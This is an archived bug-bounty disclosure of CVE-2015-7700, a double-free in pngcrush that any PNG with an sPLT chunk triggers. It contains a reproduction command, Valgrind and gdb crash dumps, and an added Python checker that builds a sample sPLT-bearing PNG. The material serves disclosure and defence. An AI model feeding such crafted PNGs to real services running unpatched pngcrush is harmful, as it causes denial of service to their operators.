hackerone: geeknik, H1:93546

Internet Bug Bounty: pngcrush double-free/segfault could result in DoS (CVE-2015-7700)

2015-10-12 20:48:45
geeknik
hackerone.com

EPSS 0.002 (Low), percentile 64.8%

All versions of pngcrush (pmt.sourceforge.net/pngcrush) prior to version 1.7.87 have a double-free/segfault that can be triggered by reading a valid PNG file that contains an sPLT chunk. This bug has been fixed in 1.7.87 by the project maintainer.

Persuading someone to run pngcrush on a valid PNG file that contains an sPLT chunk, or submitting such a PNG file remotely to a web-based service that accepts PNG files and processes them with pngcrush, causes the application to segfault. At a minimum this is a denial of service.
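Because the trigger is simply the presence of an sPLT chunk, a service that feeds uploads to pngcrush can triage files before invoking the tool. The following added example (not part of the report or of pngcrush) walks the PNG chunk structure with length and CRC checks, reports every sPLT chunk it finds, and rejects sPLT payloads that violate the chunk's layout; the sample PNG it parses is constructed inline.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

def iter_chunks(data):
    """Yield (type, payload) per chunk; reject truncation and CRC mismatches."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos < len(data):
        if pos + 8 > len(data):
            raise ValueError("truncated chunk header")
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length          # header (8) + payload + CRC (4)
        if end > len(data):
            raise ValueError("truncated chunk %r" % ctype)
        payload = data[pos + 8:pos + 8 + length]
        crc, = struct.unpack(">I", data[end - 4:end])
        if zlib.crc32(ctype + payload) != crc:   # CRC covers type + payload
            raise ValueError("bad CRC on chunk %r" % ctype)
        yield ctype, payload
        pos = end

def splt_palettes(data):
    """Return (name, sample_depth, entry_count) for each sPLT chunk in a PNG."""
    found = []
    for ctype, payload in iter_chunks(data):
        if ctype != b"sPLT":
            continue
        # Layout: name (1-79 bytes), NUL, sample depth (8 or 16), entries.
        name, sep, rest = payload.partition(b"\x00")
        if not sep or not 1 <= len(name) <= 79 or not rest:
            raise ValueError("malformed sPLT name")
        entry_size = {8: 6, 16: 10}.get(rest[0])  # bytes per palette entry
        if entry_size is None or (len(rest) - 1) % entry_size:
            raise ValueError("malformed sPLT entries")
        found.append((name.decode("latin-1"), rest[0], (len(rest) - 1) // entry_size))
    return found

def make_chunk(ctype, payload):
    """Build one chunk: big-endian length, type, payload, CRC over type+payload."""
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", zlib.crc32(ctype + payload))

# Constructed 1x1 greyscale PNG carrying a two-entry sPLT chunk (not the report's test file).
SAMPLE_PNG = (PNG_SIGNATURE
              + make_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
              + make_chunk(b"sPLT", b"demo\x00\x08" + bytes(12))
              + make_chunk(b"IDAT", zlib.compress(b"\x00\x00"))
              + make_chunk(b"IEND", b""))
```

Running `splt_palettes(SAMPLE_PNG)` returns `[('demo', 8, 2)]`; a gateway can refuse or route such files to a patched pngcrush while letting sPLT-free PNGs through.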

./pngcrush -reduce -brute ps1n0g08.png /dev/null

==56277== Invalid read of size 8
==56277== at 0x44989E: png_free_data (png.c:542)
==56277== by 0x412D99: main (pngcrush.c:6061)
==56277== Address 0x5ac66b0 is 0 bytes after a block of size 32 alloc'd
==56277== at 0x4C26B3F: malloc (vg_replace_malloc.c:299)
==56277== by 0x433A23: pngcrush_debug_malloc (pngcrush.c:2294)
==56277== by 0x478E9E: png_malloc_base (pngmem.c:91)
==56277== by 0x478E9E: png_malloc_array_checked (pngmem.c:115)
==56277== by 0x478E9E: png_realloc_array (pngmem.c:145)
==56277== by 0x4E2A7F: png_set_sPLT (pngset.c:1013)
==56277== by 0x4C93B2: png_handle_sPLT (pngrutil.c:1746)
==56277== by 0x47BE1D: png_read_info (pngread.c:222)
==56277== by 0x40BA8E: main (pngcrush.c:5082)
==56277==
Pointer 0x5555555555555555 not found
==56277== Invalid free() / delete / delete[] / realloc()
==56277== at 0x4C27C59: free (vg_replace_malloc.c:476)
==56277== by 0x4498A6: png_free_data (png.c:542)
==56277== by 0x412D99: main (pngcrush.c:6061)
==56277== Address 0x5555555555555555 is not stack'd, malloc'd or (recently) free'd
==56277==
==56277== Invalid read of size 8
==56277== at 0x4498B1: png_free_data (png.c:543)
==56277== by 0x412D99: main (pngcrush.c:6061)
==56277== Address 0x5ac66c0 is 16 bytes after a block of size 32 alloc'd
==56277== at 0x4C26B3F: malloc (vg_replace_malloc.c:299)
==56277== by 0x433A23: pngcrush_debug_malloc (pngcrush.c:2294)
==56277== by 0x478E9E: png_malloc_base (pngmem.c:91)
==56277== by 0x478E9E: png_malloc_array_checked (pngmem.c:115)
==56277== by 0x478E9E: png_realloc_array (pngmem.c:145)
==56277== by 0x4E2A7F: png_set_sPLT (pngset.c:1013)
==56277== by 0x4C93B2: png_handle_sPLT (pngrutil.c:1746)
==56277== by 0x47BE1D: png_read_info (pngread.c:222)
==56277== by 0x40BA8E: main (pngcrush.c:5082)
==56277==
==56277== Invalid write of size 8
==56277== at 0x4498C8: png_free_data (png.c:544)
==56277== by 0x412D99: main (pngcrush.c:6061)
==56277== Address 0x5ac66b0 is 0 bytes after a block of size 32 alloc'd
==56277== at 0x4C26B3F: malloc (vg_replace_malloc.c:299)
==56277== by 0x433A23: pngcrush_debug_malloc (pngcrush.c:2294)
==56277== by 0x478E9E: png_malloc_base (pngmem.c:91)
==56277== by 0x478E9E: png_malloc_array_checked (pngmem.c:115)
==56277== by 0x478E9E: png_realloc_array (pngmem.c:145)
==56277== by 0x4E2A7F: png_set_sPLT (pngset.c:1013)
==56277== by 0x4C93B2: png_handle_sPLT (pngrutil.c:1746)
==56277== by 0x47BE1D: png_read_info (pngread.c:222)
==56277== by 0x40BA8E: main (pngcrush.c:5082)
==56277==
==56277== Invalid write of size 8
==56277== at 0x4498D0: png_free_data (png.c:545)
==56277== by 0x412D99: main (pngcrush.c:6061)
==56277== Address 0x5ac66c0 is 16 bytes after a block of size 32 alloc'd
==56277== at 0x4C26B3F: malloc (vg_replace_malloc.c:299)
==56277== by 0x433A23: pngcrush_debug_malloc (pngcrush.c:2294)
==56277== by 0x478E9E: png_malloc_base (pngmem.c:91)
==56277== by 0x478E9E: png_malloc_array_checked (pngmem.c:115)
==56277== by 0x478E9E: png_realloc_array (pngmem.c:145)
==56277== by 0x4E2A7F: png_set_sPLT (pngset.c:1013)
==56277== by 0x4C93B2: png_handle_sPLT (pngrutil.c:1746)
==56277== by 0x47BE1D: png_read_info (pngread.c:222)
==56277== by 0x40BA8E: main (pngcrush.c:5082)
==56277==
Best pngcrush method = 105 (ws 11 fm 4 zl 8 zs 0) = 110
for output to /dev/null
(9.84% critical chunk reduction)
(100.00% filesize reduction)

CPU time decoding 0.610, encoding 1.930, other 0.780, total 3.320 sec.

Pointer 0x5555555555555555 not found

Program received signal SIGSEGV, Segmentation fault.
*__GI___libc_free (mem=0x5555555555555555) at malloc.c:3709
3709 malloc.c: No such file or directory.
(gdb) bt
#0 __GI___libc_free (mem=0x5555555555555555) at malloc.c:3709
#1 0x00000000004498a7 in png_free_data () at png.c:542
#2 0x0000000000412d9a in main () at pngcrush.c:6061
(gdb) i r
rax 0x0 0
rbx 0x7864d0 7890128
rcx 0x7ffff789f9d0 140737346402768
rdx 0x7ffff7b56e00 140737349250560
rsi 0x25 37
rdi 0x5555555555555555 6148914691236517205
rbp 0x786750 0x786750
rsp 0x7fffffffcfd0 0x7fffffffcfd0
r8 0x7ffff7fde700 140737354000128
r9 0x1 1
r10 0x0 0
r11 0x246 582
r12 0x20 32
r13 0x20 32
r14 0x1 1
r15 0x100 256
rip 0x7ffff784a939 0x7ffff784a939 <__GI___libc_free+25>
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0